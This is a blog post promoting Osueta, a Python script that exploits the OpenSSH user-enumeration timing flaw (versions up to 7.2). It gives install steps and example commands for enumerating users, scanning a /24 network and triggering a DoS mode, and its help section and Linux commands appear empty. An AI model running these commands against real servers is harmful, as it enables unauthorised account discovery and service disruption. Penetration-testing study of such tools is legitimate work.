miércoles, 10 de junio de 2020

Osueta: A Simple Python Script To Exploit The OpenSSH User Enumeration Timing Attack


About Osueta?
   Osueta it's a simple Python 2 script to exploit the OpenSSH User Enumeration Timing Attack, present in OpenSSH versions <= 7.2 and >= 5.*. The script has the ability to make variations of the username employed in the bruteforce attack, and the possibility to establish a DoS condition in the OpenSSH server.

    Read more: OpenSSH User Enumeration Time-Based Attack

   The bug was corrected in OpenSSH version 7.3.

   Authors of Osueta:

Osueta's Installation
   For Linux users, open your Terminal and enter these commands:
   If you're Windows users, follow these steps:
  • Install Python 2.7.x from Python.org first. On Install Python 2.7.x Setup, choose Add python.exe to Path.
  • Download Osueta-master zip file.
  • Then unzip it.
  • Open CMD or PowerShell window at the Osueta folder you have just unzipped and enter these commands:
    pip install python-nmap paramiko IPy
    python osueta.py -h

Advice: Like others offensive tools, the authors disclaims all responsibility in the use of this script.

Osueta help menu:

Osueta's examples:
   A single user enumeration attempt with username variations:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v yes


   A single user enumeration attempt with no user variations a DoS attack:
python2 osueta.py -H 192.168.1.6 -p 22 -U root -d 30 -v no --dos yes


   Scanning a C class network with only one user:
python2 osueta.py -H 192.168.1.0/24 -p 22 -U root -v no 


   Scanning a C class network with usernames from a file, delay time 15 seconds and a password of 50000 characters:
python2 osueta.py -H 192.168.1.0/24 -p 22 -L usernames.txt -v yes -d 15 -l 50


More articles
  1. Hackerx
  2. Pentest Reporting Tool
  3. Pentest Questions
  4. Pentest Keys
  5. Pentest Lab Setup
  6. Pentest Framework
  7. Pentest Questions
  8. Hacking Wifi
  9. Pentest As A Service
  10. Pentesting
  11. Pentest Distro
  12. Pentest Cheat Sheet
  13. Pentesting Tools
  14. Pentest Tools
  15. Pentest Cyber Security
  16. Pentest Iso
  17. Pentest Wifi
  18. Hacking Books
  19. Pentest Gear

No hay comentarios: